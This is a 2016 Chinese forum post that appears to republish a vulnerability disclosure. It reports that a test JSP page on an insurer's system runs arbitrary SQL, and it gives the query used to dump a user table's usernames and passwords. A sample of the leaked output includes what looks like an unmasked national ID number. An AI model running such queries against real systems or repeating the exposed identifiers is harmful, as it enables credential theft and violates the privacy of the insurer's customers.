HanDs
管理员

[7月漏洞公开] 江泰保险某系统某处设计不当可直接可执行SQL影响账号密码及大量客户保单信息 



设计不当

详细说明:

code 区域

mask 区域
1.http://**.**.**/



分析一处页面,通过抓包可直接执行SQL:

code 区域

mask 区域
1.http://**.**.**/index/indexTest.jsp



抓包:

Y1.png



条件执行,repeat请求包,去掉条件:

code 区域
select usercode,password from LDQueryUser&1&0&0



发送得到返回如下:

Y2.png



拿到了大量账号密码:

code 区域

mask 区域
*****1^522530199603130016|130016^5225011964110*****



截取部分报文尝试登陆:

Y3.png





漏洞证明:

Y3.png

修复方案:

见上分析


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
江泰┍ ι
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:0
游客组
快速回复